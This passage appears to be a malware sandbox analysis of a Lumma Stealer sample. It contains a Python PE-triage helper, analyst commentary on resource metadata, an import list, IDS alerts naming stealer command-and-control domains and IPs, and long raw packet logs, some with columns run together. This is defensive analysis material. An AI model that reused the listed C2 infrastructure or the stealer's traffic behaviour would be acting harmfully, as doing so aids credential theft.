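    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes

    def sec(name, vsize, va, raw, rawptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), rawptr, 0, 0, 0, 0, flags)

    hdr = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)
    hdr += sec(b".text", 0x200, 0x1000, text, 0x200,
               IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    hdr += sec(b".data", 0x10000, 0x2000, data, 0x400,
               IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    return hdr.ljust(file_align, b"\0") + text + data
```

To run it against a real file, pass open(path, "rb").read() to parse_pe() instead of build_sample_pe(); on the constructed sample, triage() reports .text as high-entropy code and .data as virtually bloated, which is the same pattern the .text entropy of 7.54 and the .data size mismatch in the table above show. The entropy check only fires on executable sections on purpose: a high-entropy .rsrc full of compressed icons is normal, a high-entropy .text is not.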
Resources (Type shown last for readability):
Name       RVA       Size    Language  Country       ZLIB Complexity      Type
RT_CURSOR  0x43c0c8  0xea8   -         -             0.31023454157782515  Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON    0x431610  0xea8   Turkmen   Turkmenistan  0.3296908315565032   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON    0x4324b8  0x8a8   Turkmen   Turkmenistan  0.3935018050541516   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON    0x432d60  0x6c8   Turkmen   Turkmenistan  0.3945852534562212   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
RT_ICON    0x433428  0x568   Turkmen   Turkmenistan  0.4031791907514451   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON    0x433990  0x25a8  Turkmen   Turkmenistan  0.22074688796680497  Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON    0x435f38  0x10a8  Turkmen   Turkmenistan  0.24835834896810507  Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON    0x436fe0  0x988   Turkmen   Turkmenistan  0.2778688524590164   Device independent bitmap graphic, 24 x 48 x 32, image size 2400
RT_ICON    0x437968  0x468   Turkmen   Turkmenistan  0.30319148936170215  Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_ICON    0x437e48  0xea8   Turkmen   Turkmenistan  0.8264925373134329   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON    0x438cf0  0x8a8   Turkmen   Turkmenistan  0.868231046931408    Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON    0x439598  0x6c8   Turkmen   Turkmenistan  0.8277649769585254   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
RT_ICON    0x439c60  0x568   Turkmen   Turkmenistan  0.7485549132947977   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON    0x43a1c8  0x10a8  Turkmen   Turkmenistan  0.8330206378986866   Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON    0x43b270  0x988   Turkmen   Turkmenistan  0.8442622950819673   Device independent bitmap graphic, 24 x 48 x 32, image size 2304
RT_ICON    0x43bbf8  0x468   Turkmen   Turkmenistan  0.8599290780141844   Device independent bitmap graphic, 16 x 32 x 32, image size 1024
RT_STRING  0x43d140  0x47a   -         -             0.4424083769633508   data
RT_STRING  0x43d5c0  0xc8    -         -             0.57                 data
RT_STRING  0x43d688  0x6a8   -         -             0.43133802816901406  data
RT_STRING  0x43dd30  0x600   -         -             0.4303385416666667   data
RT_STRING  0x43e330  0x802   -         -             0.41804878048780486  data

Language and Country come from the language ID stored in the resource directory, which the author sets freely; "Turkmen/Turkmenistan" on the icons is metadata worth pivoting on (it is unusual for legitimate software) but is not evidence of origin. The RT_CURSOR and RT_STRING entries carry no language ID. The two sets of icons are distinguishable by their ZLIB complexity (0.22 to 0.40 versus 0.75 to 0.87), which means the second set is far less compressible for images of identical dimensions; that is not by itself malicious, but it is the kind of resource-level inconsistency that a resource hash or icon hash (46c7c30b0f4e0d19 above) can be used to track across samples.
                                                                                                                                                                                                                                                                        RT_STRING0x43eb380x75edata0.4268292682926829
                                                                                                                                                                                                                                                                        RT_STRING0x43f2980x56cdata0.4546109510086455
                                                                                                                                                                                                                                                                        RT_STRING0x43f8080x6cedata0.4293915040183697
                                                                                                                                                                                                                                                                        RT_STRING0x43fed80x556data0.44363103953147875
                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x43cf700x14data1.25
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x43c0600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x437dd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                                        RT_VERSION0x43cf880x1b4data0.5665137614678899
DLL | Import
KERNEL32.dll | SetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll | GetProcessDefaultLayout
GDI32.dll | GetBitmapBits
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T14:08:20.314370+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.11 | 49710 | 104.21.56.70 | 443 | TCP
2024-12-14T14:08:22.125562+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.11 | 49711 | 176.113.115.19 | 80 | TCP
2024-12-14T14:08:26.932851+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.11 | 65123 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:27.080742+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.11 | 50695 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:28.700029+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:28.700029+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:31.833197+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:31.833197+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:31.890380+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.11 | 60070 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:33.255896+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:33.255896+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:35.496884+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:35.496884+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:35.503971+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.11 | 62009 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.645792+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.11 | 53761 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.788540+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.11 | 55952 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.932103+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.11 | 49991 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:36.072146+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.11 | 50751 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:36.213814+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.11 | 62987 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:37.950634+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49754 | 104.102.49.254 | 443 | TCP
2024-12-14T14:08:38.895332+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.11 | 49754 | 104.102.49.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321742058 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321829081 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321861029 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321985006 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.330316067 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.330398083 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333236933 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333309889 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333472013 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333729029 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341674089 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341753960 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341789961 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341804028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350084066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350147963 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350259066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350363016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358484983 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358546972 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358603001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358644009 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.366926908 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.366976976 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.367002964 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.367039919 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375339031 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375397921 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375437975 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375485897 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384038925 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384108067 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384140968 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384201050 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391360998 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391416073 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391491890 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391535997 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399012089 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399068117 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399079084 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399122953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.437732935 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.437799931 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509841919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509963989 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509991884 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.510046005 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512186050 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512260914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512429953 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512532949 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517045975 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517119884 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517162085 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517211914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.521920919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.521997929 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.522006035 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.522052050 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526622057 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526691914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526833057 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526880026 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531359911 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531429052 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531441927 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531516075 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.535940886 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536000013 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536043882 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536086082 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540437937 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540508986 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540532112 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540594101 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545044899 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545121908 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545146942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.545233011 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549581051 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549643993 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.549714088 CET8049711176.113.115.19192.168.2.11
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 14, 2024 14:08:22.549755096 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.554095984 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.554153919 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.554245949 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.554286957 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.558671951 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.558751106 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.558779001 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.558825016 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.563229084 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.563292027 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.563317060 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.563349009 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.567783117 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.567837954 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.567876101 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.567924976 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.571547985 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.571605921 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.571666002 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.571716070 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.575382948 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.575440884 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.575455904 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.575504065 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.579274893 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.579339027 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.579401970 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.579447985 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.583059072 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.583123922 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.583138943 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.583182096 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.586872101 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.586905956 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.586937904 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.586954117 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.590677023 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.590740919 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.590770960 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.590816021 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.594590902 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.594604015 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.594660044 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.598364115 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.598423958 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.598437071 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.598478079 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.629834890 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.629890919 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.629980087 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.630023003 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.631772041 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.631815910 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.631846905 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.631894112 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.702059984 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.702195883 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.702285051 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.702348948 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.703516960 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.703577042 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.703613997 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.703655958 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.706442118 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.706492901 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.706525087 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.706573963 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.709191084 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.709223986 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.709254026 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.709285021 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.712167978 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.712219954 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.712281942 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.712331057 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.714939117 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.714988947 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.715044022 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.715091944 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.717678070 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.717727900 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.717767000 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.717808008 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.720391035 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.720442057 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.720480919 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.720530033 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.722970009 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.723021984 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.723062992 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.723112106 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.725636005 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.725699902 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.725730896 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.725775957 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.728233099 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.728285074 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.728348970 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.728395939 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.730827093 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.730880976 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.730953932 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.731002092 CET  49711        80         192.168.2.11     176.113.115.19
